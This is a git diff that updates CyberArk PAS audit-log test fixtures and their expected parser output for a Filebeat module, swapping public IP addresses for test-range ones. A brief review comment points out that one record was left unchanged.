b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json index a0bfbd934d65..0716bf261f63 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json 
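Review bot: The public-address scrub is inconsistent across the cyberarkpas fixtures in this commit: 52_delete_file.log now carries only loopback, RFC 1918, link-local or test-range addresses, but the 60_cpm_reconcile_password_failed.log hunk further down leaves its third record (the UnixSSH/testark one) as an unchanged context line with `34.123.103.115` in `File`, `Reason`, `ExtraDetails` and `CAProperties.Address`. Routable addresses in shipped sample data can be mistaken for indicators when the fixture is loaded into a test cluster and may disclose lab infrastructure, which appears to be what the rest of the diff avoids by substituting `67.43.156.x` and `81.2.69.143`. If that record is rewritten the same way, the companion `-expected.json` has to be regenerated too, since `log.offset` and the `source.geo.*` fields shift with the new address length, as the other expected-file hunks here show. The final record of that hunk is cut off at the end of this view, so I could not confirm whether it was updated.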
@@ -151,11 +151,11 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T18:59:57Z", "cyberarkpas.audit.issuer": "PSMApp_ASR-WIN", "cyberarkpas.audit.message": "Delete File", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 35.192.121.42\n \n \n \n \n \n Delete File\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 67.43.156.12\n \n \n \n \n \n Delete File\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "35.192.121.42", + "cyberarkpas.audit.station": "67.43.156.12", "cyberarkpas.audit.timestamp": "Mar 11 10:59:57", "event.action": "delete file", "event.code": "52", @@ -175,18 +175,16 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "35.192.121.42" + "67.43.156.12" ], "service.type": "cyberarkpas", - "source.address": "35.192.121.42", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "35.192.121.42", + "source.address": "67.43.156.12", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -222,7 +220,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 3907, + "log.offset": 3905, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", @@ -242,18 +240,18 @@ { "@timestamp": "2021-03-11T21:06:40.000Z", "cyberarkpas.audit.action": "Delete File", - "cyberarkpas.audit.ca_properties.address": "35.192.121.42", + "cyberarkpas.audit.ca_properties.address": "67.43.156.12", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.user_name": "PSMConnect", "cyberarkpas.audit.desc": "Delete File", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-PSMConnect", "cyberarkpas.audit.gateway_station": "10.0.1.20", "cyberarkpas.audit.iso_timestamp": "2021-03-11T21:06:40Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Delete File", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-35.192.121.42-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-67.43.156.12-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", 
@@ -268,11 +266,11 @@ "event.module": "cyberarkpas", "event.severity": 2, "event.timezone": "-02:00", - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-PSMConnect", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 6037, + "log.offset": 6035, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", @@ -322,7 +320,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 8223, + "log.offset": 8217, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", @@ -372,7 +370,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 10117, + "log.offset": 10111, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", @@ -426,7 +424,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 12005, + "log.offset": 11999, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", @@ -480,7 +478,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 14321, + "log.offset": 14315, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log index 2a5483207bfe..a32fa542b335 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log 
@@ -1,9 +1,9 @@ -<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 
60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM 
Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 
11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n 
CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set 